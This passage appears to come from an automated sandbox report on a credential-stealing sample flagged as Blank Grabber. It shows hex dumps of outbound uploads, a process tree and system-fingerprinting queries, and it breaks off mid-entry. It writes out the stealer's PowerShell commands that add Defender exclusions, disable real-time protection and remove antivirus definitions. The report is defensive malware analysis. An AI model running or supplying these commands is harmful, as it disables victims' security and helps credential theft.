2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 51 2e 96 07 78 37 52 e3 9a e7 12 86 fa 27 01 c7 54 8d ab 33 eb dd 1b b0 bd f1 c6 d1 f2 97 60 ca 72 66 0c 13 70 8d ac 6b e8 d8 7d c9 0a 79 73 22 d3 9e 96 1b 88 ab 49 44 e7 62 a4 32 ab 00 1d ad 2b ce 1a 9f 9b a0 50 54 5d 24 1c 76 ec 68 b2 c7 a4 bc 47 5f 97 cd d5 a1 50 3a 1d 8e 60 17 96 87 fc 2a b5 da fc a1 da 9b e2 00 7e 30 37 b3 34 92 42 c9 90 62 8c 75 ef e6 fc 14 72 80 ce 91 20 db 56 95 5b 13 94 e1 1c 6b 92 ca 93 c2 6a 29 74 76 f9 ca ca 23 62 48 69 6a 0f de 18 e6 73 72 53 e0 cd 1b c8 df f0 86 e4 53 df 93 1f e9 90 db fb 73 1b d6 54 2b 3c f0 3e fc a2 b7 8a 26 a6 48 34 2f b0 99 53 84 32 6f cf 16 34 66 ec 5d f5 b2 2e 63 4b 6c 25 08 58 90 76 37 e1 4c 48 e6 74 03 bc 47 16 b0 83 30 8c ac f8 cf c5 50 1c 2d f9 10 f2 03 fe 85 b1 59 f1 8a 54 38 6c ec 18 ee 82 d7 b5 Data Ascii: Q.x7R'T3`rfpk}ys"IDb2+PT]$vhG_P:`*~074Bbur V[kj)tv#bHijsrSSsT+<>&H4/S2o4f].cKl%Xv7LHtG0P-YT8l
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: c0 84 c3 aa cf d3 0f 50 62 d1 92 99 4f 05 f6 02 4a 11 b9 eb e8 52 02 5d 48 5e c8 f5 ba cc 86 62 aa 1f 23 97 cd 0d 06 60 7b f3 2a 2b b5 f2 41 bc a6 8f 8b 0e d2 57 56 f8 db 0a 15 c2 5d 78 ec 9e bf 68 3e 9e c2 a1 f5 e0 ea 30 02 f9 14 28 5d 9a 39 7c 26 6e d0 1a 26 76 02 47 37 13 76 cf 2a d0 13 af 90 fc 94 3a 0f 21 ed 8b 61 81 80 81 4d 98 5e 86 f5 97 aa 66 c1 93 29 c4 78 40 f3 78 0b e3 f3 d0 97 7b df ef 87 19 90 01 f9 2a 85 f1 57 68 8f a3 f3 bb 04 b1 86 e9 f8 39 ac 8d 47 ff d0 80 f4 60 81 2e 8d db 34 2f 92 42 20 c6 1a 5e 49 91 e2 59 49 f0 de 92 bc f9 5a 5d 69 63 52 2d 49 12 07 39 3e 7d 7d d4 55 6d c1 3e 08 8b 33 dc 99 bd f6 05 e9 0c 6d df 73 a0 99 ab ee a4 30 ae 63 7c 0c ab 78 99 a9 f2 59 76 d8 ab bf a6 d5 72 1f 7c 65 7c 09 70 db e3 1f f5 a3 b4 3d 0b 81 83 2f Data Ascii: PbOJR]H^b#`{+AWV]xh>0(]9\|&n&vG7v:!aM^f)x@x{*Wh9G`.4/B ^IYIZ]icR-I9>}}Um>3ms0c\|xYvr\|e\|p=/
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: ae 1f 2d 00 f5 4b 90 07 16 4c 24 95 f3 e5 dc 58 bd b6 a9 99 f3 06 95 26 e3 bf ef 9f e7 c0 2f b5 91 d9 f1 9b c0 41 b6 19 09 a9 76 83 1c 3a 54 4f 4e 56 b0 f3 37 00 a1 4a af ed 83 37 a3 71 3e 68 6c ad 91 6b 31 4b f1 84 94 14 38 ab 39 2b c8 fa d0 7e 6f 54 59 c0 c5 ee 62 37 15 f7 43 47 44 ed 20 99 11 bd 95 4e 1d b0 d6 68 a9 0b 46 7b 70 a3 25 c6 58 63 cd 88 1e 4a 95 e9 bd 6c 38 2c d5 f8 9d bb 5d b3 80 c0 41 77 9d 3c 77 3a 87 0f c7 73 bc bd 99 81 25 31 53 be 43 11 30 37 1c 23 f9 38 0c de 99 40 82 19 5c f7 90 91 fc aa 1d 85 8a d7 bd 3c 12 47 fa e9 4c 80 41 fa f5 5e 58 9a 30 59 9c cc 53 7c 4b 5e 71 d9 7b 93 c3 8c ca e4 31 bd 01 28 8c 0e ba d6 c0 78 5d 7e 6c 2c 7b 47 e8 ab fb 73 04 8e e1 57 0a 34 78 33 31 7f c2 7a b9 3b c5 05 9f 6e 73 a4 c3 77 22 a0 4a 8e 4c c5 bc Data Ascii: -KL$X&/Av:TONV7J7q>hlk1K89+~oTYb7CGD NhF{p%XcJl8,]Aw<w:s%1SC07#8@\<GLA^X0YS\|K^q{1(x]~l,{GsW4x31z;nsw"JL
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: a8 d9 13 51 61 91 27 58 26 c3 89 9f 6e 0d 16 1b e5 f2 a0 e3 b2 c7 71 9c 2d 2d af 23 14 ec 52 67 52 3d 85 d7 89 62 83 94 7e 56 fc 64 d6 7d 1f e0 f6 4c b9 7b 73 b0 bb 7d bd ea f1 80 cd 96 a6 34 88 ae c5 83 1a da 04 e2 66 ac c7 bb bf 2f 3a 42 55 97 d3 be 7d 7f 79 91 7a 2b 36 bc 8d aa bb 6f f6 e9 c7 de 91 16 42 de 3b 3f 75 da b8 5e 37 f0 3d 41 36 9a 73 4d e6 d0 ad e5 3a ef 85 e7 91 31 ec 3b 63 34 07 0f 6a 00 a5 86 79 15 09 19 2c c3 f3 e5 54 72 f4 10 77 32 9a 1d af ca bc b4 6e 20 0a 46 64 15 a3 60 9f 2c 8d 30 b5 9b 48 23 13 94 f0 df cd d7 a0 c7 aa 59 f2 1a 0f d8 6f 87 71 41 b4 a1 fb 3d e4 fc 4d a9 ee 72 13 30 87 08 86 35 11 94 ba 02 08 d6 1f 77 c2 31 aa 23 8d a4 1f 70 66 6f ca de a5 86 4f 5f 7e bd 91 07 4a ad 25 22 84 10 4d 68 7b 2b 0f 65 11 7c f5 97 bb 9f 74 Data Ascii: Qa'X&nq--#RgR=b~Vd}L{s}4f/:BU}yz+6oB;?u^7=A6sM:1;c4jy,Trw2n Fd`,0H#YoqA=Mr05w1#pfoO_~J%"Mh{+e\|t
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 4f 85 49 27 26 fa c2 56 d4 6a b7 06 64 30 3c 44 43 69 24 84 a9 7c 74 37 9e c3 19 c2 47 38 c5 66 e3 54 9b b2 c4 9b 8b 23 93 34 dd 6a a3 50 ab 6d c2 33 98 ba 77 21 8d ff 72 78 7a 99 3a 28 90 0b 57 ea 57 b6 01 43 4e f3 81 8e d4 a6 4e d5 e1 c7 ad 8a 69 16 60 01 6a 6e 1d 92 85 1f b8 24 de 2c b1 46 b4 4d 16 ee 91 94 2b f6 1b fe e5 06 bc 45 b8 ff ec ca 52 04 1a 27 28 61 24 83 55 d6 ce 80 5e 42 b0 8a 04 30 7e 23 df 65 1f d2 10 bd cd b0 02 00 fd 0f cb 4a 28 05 24 27 65 43 1e 8a 83 55 d5 f5 b8 b3 5f f6 88 7a 4b 4b fc af 55 2e 2e e1 8c 37 38 85 e3 04 70 d4 6a b5 6e 59 77 0f 4c 25 82 82 39 5b 0e d8 cb d7 29 14 1d a1 d0 a1 2d 17 4d b3 4f c8 ca 25 e7 9b d6 af 54 48 75 53 f4 a9 5d 85 26 fd 97 04 f4 c5 ed ce 91 d0 cc 8c f5 4a 35 7f 38 47 13 18 23 06 9a f8 64 36 20 ad 4a Data Ascii: OI'&Vjd0<DCi$\|t7G8fT#4jPm3w!rxz:(WWCNNi`jn$,FM+ER'(a$U^B0~#eJ($'eCU_zKKU..78pjnYwL%9[)-MO%THuS]&J58G#d6 J
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 5f 77 2b fc eb bd 3b dc 80 91 e4 ec 1c 08 1e b8 5d 93 9f a2 b4 e9 07 f1 eb eb 72 43 9c 3c b9 b0 c3 94 d0 2e 0f d4 e7 5d ea 88 64 77 e0 2a 45 4f d6 be cb 9a 77 eb d5 ef 15 95 f4 f0 b7 58 05 a4 04 ab f9 44 45 ed 66 e5 ae a5 1b d4 e6 38 c1 39 df f8 1e c0 c2 04 ee 7f 00 b4 9e 59 19 ca c7 25 8d 4e d2 29 69 7f c3 54 20 53 c8 04 b7 d1 d3 1d a1 82 dd e6 d8 c0 4e b2 52 9a d7 46 f0 e8 71 07 c1 c7 64 fe e6 e1 b6 b5 57 c5 8b b0 74 0f bf 12 a5 9a 22 6d a8 6a 51 a8 0a 81 c1 44 f0 0d 46 f8 28 a2 2a 03 66 cd bc 64 d0 74 4f 0e 70 9c 25 9a e4 64 46 a9 76 cd c3 1f 17 4a 08 4e 39 21 9e 95 19 5e 2d 63 87 21 27 24 60 d0 26 10 46 b1 a2 95 db 44 f6 0c b0 03 db 7d 0f 8e fb 64 e2 0f 76 72 a1 81 a5 4e ad ce 5d fe 26 94 21 f7 6c 97 1d 2c a6 3b fd ef 39 e2 18 57 ce eb 8c 33 ff f9 a2 Data Ascii: _w+;]rC<.]dwEOwXDEf89Y%N)iT SNRFqdWt"mjQDF(fdtOp%dFvJN9!^-c!'$`&FD}dvrN]&!l,;9W3
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 2e a3 e9 65 ad 64 4f 85 ff c7 e9 12 1b ea 79 7f 4b 35 17 9e 8b 0b 13 16 1a ea 43 df 9c 13 7d a7 ae d7 cc 8c 9f 16 e0 64 4e 54 58 58 e5 ee c2 8b 9a 98 da 6a 38 24 7d dd 01 fc 83 ac b9 0a 16 06 72 14 8d 42 73 42 87 f5 ec 68 75 32 34 9f a4 cf e0 c2 89 2d 9e 22 6c c2 b9 10 d8 c6 ac e1 fe 9e 8f 5d 9b 74 97 3a f7 79 4e 0a b8 53 f0 c3 e8 b5 e4 23 0c 13 7b b1 27 16 94 a5 06 cc 72 9d 89 7c 21 7c 55 5c 8a 56 fa 09 d5 8a f1 64 8f ae c6 98 76 5e 50 c2 24 77 9c dd 1b 11 34 5d cd ab 28 db c3 67 f3 2a 1c df e1 a8 02 22 d6 34 2b 76 0c 11 7e 66 5d e7 01 a6 2b fa ac 22 e4 64 75 50 9b f7 21 7e 68 2f 08 b8 a3 2c 2c d0 bd 6a 98 52 15 3e 92 d3 cd 30 f2 46 bf e5 fe 4a b6 20 0e 20 73 04 f2 8c 39 23 44 70 50 a4 f2 6e 97 f5 84 b1 44 60 02 75 5a eb b8 b3 fb 02 dc 84 3d 76 76 43 33 Data Ascii: .edOyK5C}dNTXXj8$}rBsBhu24-"l]t:yNS#{'r\|!\|U\Vdv^P$w4](g*"4+v~f]+"duP!~h/,,jR>0FJ s9#DpPnD`uZ=vvC3
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 27 ef e3 90 fd 33 18 a2 55 ce ec 4e 8c 4b 03 da c4 91 dd 99 c5 ef 69 ae eb 27 7b d9 45 37 9b 15 a1 09 fa 8a 43 5e 0f b2 b0 84 e3 0a 33 b1 19 2d 17 89 ce f5 e7 38 3f 33 16 81 3f c0 14 55 88 38 a6 59 68 f3 89 f3 20 59 d3 58 29 96 b7 4e 00 5c 02 11 3c 7c 82 78 4b 6f 61 bf 21 0c 01 52 fc 76 b0 75 59 01 ec 0a f4 fe c9 2e c8 e2 39 07 b5 21 fb ce 70 8b e2 44 ec 04 eb 27 c1 3b a7 a7 1b 8c 14 ad 7f 8e e4 22 95 eb 49 8d 8f 50 3e a8 41 66 65 cc ec 49 b0 b9 21 9f 89 2f 85 ba 71 3e 2c 37 dc 77 d7 b4 8a 0a f7 bd e9 66 5d 15 09 76 af f4 f4 9c be 37 e7 62 9b b6 0b 02 f2 96 6b 8b 16 73 df b3 16 3b c6 26 1c e1 d9 7d 06 c5 a3 d8 e1 80 cd 6a 24 72 a3 86 6a 83 e6 4a 9e 44 fa 54 ff 5d 50 76 37 b2 a4 7d 52 64 de 47 6c 59 84 df 38 1b 42 af 12 69 66 fe 1c d5 f7 4c f4 5a 8d 42 d9 Data Ascii: '3UNKi'{E7C^3-8?3?U8Yh YX)N\<\|xKoa!RvuY.9!pD';"IP>AfeI!/q>,7wf]v7bks;&}j$rjJDT]Pv7}RdGlY8BifLZB
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 1c 0a ff b2 56 23 17 1e b3 bb e5 66 7c 94 43 36 f4 9b 6b 05 96 99 62 55 84 d9 93 37 25 73 c8 b7 68 f0 d5 4a 99 f3 c7 d4 96 55 51 b8 fa 55 0d b7 59 c5 37 57 53 0a 7f 6e c8 0b d4 a9 9b c6 4e b3 f8 93 b1 01 c8 f6 fe 50 62 59 1e 42 d6 10 9f 1f 44 bb 6e 94 55 4c ff 77 ae ea 1e ed f5 70 94 ec bb 11 85 8e 0f 6c 7c 42 93 a8 b4 46 df fa 82 72 80 a7 91 5a 49 58 cc 6b 43 24 57 06 1f 40 81 bf 8a da 1a 1d e5 f8 ef d6 49 d6 a2 51 3b 81 11 70 7c 3c f4 f3 ef fe fb ff 58 dd 48 0b 53 60 3b 16 e8 1f 88 f9 f4 90 5f fb 57 1b 4a 1b bc 34 14 2c 7e a7 65 3e 8b f3 f9 45 d4 33 09 43 43 85 70 28 b9 40 39 bb 19 22 23 64 b2 d7 b1 a5 18 4d a8 d7 45 e7 ee 67 6a 0a 5a f6 93 ea 99 7e 97 bd ce fe 07 ef e1 dd 65 8c 4f 0e 35 3e fd a4 df a6 16 d6 b9 d6 fe c0 c4 73 b7 22 b2 ab ca 3d 95 6e 27 Data Ascii: V#f\|C6kbU7%shJUQUY7WSnNPbYBDnULwpl\|BFrZIXkC$W@IQ;p\|<XHS`;_WJ4,~e>E3CCp(@9"#dMEgjZ~eO5>s"=n'
2025-01-07 20:01:43 UTC	1257	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:43 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Set-Cookie: __dcfduid=373c7666cd3211ef84514ee658b32f41; Expires=Sun, 06-Jan-2030 20:01:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1736280104 x-ratelimit-reset-after: 1 vary: Accept-Encoding via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xisDxo0CBCrxPkjxSmxthNR%2BLYZ%2Bq%2Bbf31wBsXwNckMax9LnHuS9JkdyuFqAhh53oVpMP8qHCs95ZKv%2BLIHaCWrRbaayq6RBKQqrv4VjyeU8Jf%2FKUHdyqBFDszpa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=373c7666cd3211ef84514ee658b32f4198d536243a72f35b4e92a3159e8a52a293d0fd11ee7344a496046b5b777f1bfe; Expires=Sun, 06-Jan-2030 20:01:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Target ID:	0
Start time:	15:00:58
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\47SXvEQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\47SXvEQ.exe"
Imagebase:	0x400000
File size:	13'090'304 bytes
MD5 hash:	CE5152D5376F6AD0C918FB893248DD08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:01:03
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\instals.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\instals.exe"
Imagebase:	0x7ff7f1460000
File size:	5'264'896 bytes
MD5 hash:	C289921058A4B38BDBD1373A0CBB757D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:01:03
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:01:03
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:01:03
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Built.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Built.exe"
Imagebase:	0x7ff626640000
File size:	6'259'986 bytes
MD5 hash:	CF6FC2AEA60B6D65DCC9C16166C8161A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:01:04
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Built.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Built.exe"
Imagebase:	0x7ff626640000
File size:	6'259'986 bytes
MD5 hash:	CF6FC2AEA60B6D65DCC9C16166C8161A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:01:06
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:01:07
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:01:07
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:01:07
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff690e90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:01:07
Start date:	07/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff774ad0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:01:12
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:01:12
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff697290000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff697290000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:01:13
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
